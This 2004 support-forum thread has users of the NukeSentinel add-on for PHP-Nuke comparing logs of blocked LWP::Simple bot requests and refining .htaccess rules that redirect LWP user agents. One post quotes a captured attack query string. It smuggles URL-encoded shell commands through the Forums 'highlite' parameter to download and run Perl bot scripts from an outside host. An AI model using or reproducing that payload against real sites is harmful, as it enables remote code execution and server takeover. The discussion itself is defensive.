Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel™
Author Message
flatliner
New Member
New Member


Joined: Dec 25, 2004
Posts: 2

PostPosted: Sat Dec 25, 2004 8:41 am Reply with quote

Man what a Xmas got home from spending time at the InLaws (OMG) as if thats not bad enough I see 30 emails from my website all blocked attempts. Thanks for everything your protection saved me.

Quote:
Date & Time: 2004-12-25 09:32:47
Blocked IP: 216.127.92.58
User ID: Anonymous (1)
Reason: Abuse-Harvest
String Match: lwp::simple
--------------------
User Agent: LWP::Simple/5.803
Query String: Only registered users can see links on this board! Get registered or login!
Forwarded For: none
Client IP: none
Remote Address: 216.127.92.58
Remote Port: 39488
Request Method: GET
 
View user's profile Send private message
64bitguy
The Mouse Is Extension Of Arm


Joined: Mar 06, 2004
Posts: 1159
Location: Sanbornton, NH USA

PostPosted: Sat Dec 25, 2004 10:28 am Reply with quote

Since about 1:21AM this morning, my site has been hit by 109 different abuse attempts, an all-time high. In fact, in the past 11 hours I've been protected by NukeSentinel more times than the combined history.

They are all various types of lwp::simple attacks.

They range from highlight abuse attempts to XSS abuse attempts, to well.. you name it.

If I didn't know better, I'd swear this was either the activity of a trojan or worm on people's systems.

Anyway, I feel bad for anyone that hasn't upgraded to 2.0.11 because 99% of these attacks are going after my Forums, unlike the above post.

For example:

Quote:
Query String: (Edited to mess with the script kiddies) 64bit.us/modules.php?name=Forums&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20civa.org/pdf/bot;perl%20bot;wget%20civa.org/pdf/ssh.a;perl%20ssh.a;rm%20-rf%20ssh.*;rm%20-rf%20bot*%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlite=%2527.%70%61%73%73%74%68%andonandonandon


Anyway... I've got a TON of these and others if anyone wants them.. Let's hope the hacks attemps slow down soon!

_________________
Steph Benoit Only registered users can see links on this board! Get registered or login!
1CMS, 100% Section 508 and W3C XHTML/CSS Compliant (Truly) 
View user's profile Send private message Visit poster's website
flatliner
PostPosted: Sat Dec 25, 2004 10:49 am Reply with quote

Since my last post I have received another 30 or so attacks. I didnt think i was that popular LOL. What do you have for your blocker strings? are you default or did you add more?
My harvester List is default and mu Request method I added:
Delete
Delete & Trace
HEAD
Trace
String Blocker has no List
 
Raven
Site Admin/Owner


Joined: Aug 27, 2002
Posts: 17086

PostPosted: Sat Dec 25, 2004 10:51 am Reply with quote

Only registered users can see links on this board! Get registered or login! Only registered users can see links on this board! Get registered or login! Only registered users can see links on this board! Get registered or login!
 
View user's profile Send private message
64bitguy
PostPosted: Sat Dec 25, 2004 11:14 am Reply with quote

Thanks Raven, I guess I missed those posts about everyone else getting attacked, but given the scale of the attacks and the VAST number of IP's involved, I'm forced to wonder if this is a worm, virus or what?

At present, I haven't changed my .htaccess because frankly, I've modified my forwarding properties in NukeSentinel so it sends them to a Google adsense ad... Smile I figure what the heck, if I'm going to get attacked, they might as well pay me for it Smile

If I can figure out the right rewrite condition/rule for htaccess to forward them to an adsense ad (instead of to the php file) I'll mod it accordingly.

Smile

Thanks for the info!
 
Muffin
Client


Joined: Apr 10, 2004
Posts: 649
Location: UK

PostPosted: Sat Dec 25, 2004 4:48 pm Reply with quote

Which htaccess file do we have to put this c ode in and where?

Quote:
RewriteEngine on
#The next lines check for Spammers Robots and redirect them to a fake page
RewriteCond %{HTTP_USER_AGENT} ^LWP::Simple
RewriteRule ^.*$ emailsforyou.php [L]
RewriteEngine Off


in my nuke/html folder htaccess I just have a list of banned ip's and in the abuse folder htaccess it just says allow from all

thanks

_________________
Classic Mini rules the bends & bends the rules!
[img] 
View user's profile Send private message
Raven
PostPosted: Sat Dec 25, 2004 6:02 pm Reply with quote

It goes in your main .htaccess folder.
 
Muffin
PostPosted: Sat Dec 25, 2004 7:00 pm Reply with quote

Thanks Raven

Do I put it in the top of the htaccess file?

All I have in mine at the moment is a list of the ip's that sentinel has banned and nothing else. Thats in the nuke/html/abuse folder.

Or do you mean the main htaccess in my hosting root directory?

Dont ya just love us brainy ones lol
 
Raven
PostPosted: Sat Dec 25, 2004 9:06 pm Reply with quote

Main .htaccess, where config.php is stored. I would put it at the top.
 
djdiz-e
Regular
Regular


Joined: Dec 19, 2004
Posts: 51
Location: Ontario, Canada

PostPosted: Sat Dec 25, 2004 10:29 pm Reply with quote

i added this to my .htaccess is this right?

Quote:
RewriteEngine on
#The next lines check for Spammers Robots and redirect them to a fake page
RewriteCond %{HTTP_USER_AGENT} ^LWP::Simple
RewriteCond %{HTTP_USER_AGENT} ^LWP::Trivial [NC]
RewriteRule ^.*$ emailsforyou.php [L]
RewriteEngine Off
 
View user's profile Send private message Send e-mail Visit poster's website
Raven
PostPosted: Sat Dec 25, 2004 10:35 pm Reply with quote

Instead of
Code:
RewriteCond %{HTTP_USER_AGENT} ^LWP::Simple 

RewriteCond %{HTTP_USER_AGENT} ^LWP::Trivial [NC]
Use
Code:
RewriteCond %{HTTP_USER_AGENT} ^LWP [NC]
 
djdiz-e
PostPosted: Sat Dec 25, 2004 10:43 pm Reply with quote

ah good idea thanks Smile

and another question emailsforyou.php
is that a page that displays to the attacker?
 
Raven
PostPosted: Sat Dec 25, 2004 10:48 pm Reply with quote

No. But it can be whatever you want.
 
djdiz-e
PostPosted: Sat Dec 25, 2004 11:12 pm Reply with quote

i added this to the top of my .htaccess and i still get emails from sentinal saying it blocked ..this normal?

My .htaccess file:
Quote:
RewriteEngine on
#The next lines check for Spammers Robots and redirect them to a fake page
RewriteCond %{HTTP_USER_AGENT} ^LWP [NC]
RewriteRule ^.*$ emailsforyou.php [L]
RewriteEngine Off


E-mail:
Quote:
Date & Time: 2004-12-26 00:07:18
Blocked IP: 65.254.55.250
User ID: Anonymous (1)
Reason: Abuse-Filter
--------------------
User Agent: LWP::Simple/5.800
Query String: Only registered users can see links on this board! Get registered or login!
Forwarded For: none
Client IP: none
Remote Address: 65.254.55.250
Remote Port: 33645
Request Method: GET
--------------------
 
Muffin
PostPosted: Sun Dec 26, 2004 5:41 am Reply with quote

Thanks Raven {{{hugs}}}

djdiz-e you need to add this line as well I think

Quote:
RewriteCond %{HTTP_USER_AGENT} ^LWP::Simple
 
Raven
PostPosted: Sun Dec 26, 2004 8:03 am Reply with quote

Muffin wrote:
Thanks Raven {{{hugs}}}

djdiz-e you need to add this line as well I think

Quote:
RewriteCond %{HTTP_USER_AGENT} ^LWP::Simple
No, you don't need that line. The ^LWP [NC] means any user-agent beginning with LWC, regardless of case.
 
twinjet
New Member
New Member


Joined: Jan 17, 2005
Posts: 22

PostPosted: Fri Jan 28, 2005 1:37 am Reply with quote

i was just simple and wanted to let the poster of this the it is makarena not makerel
 
View user's profile Send private message
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel™

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©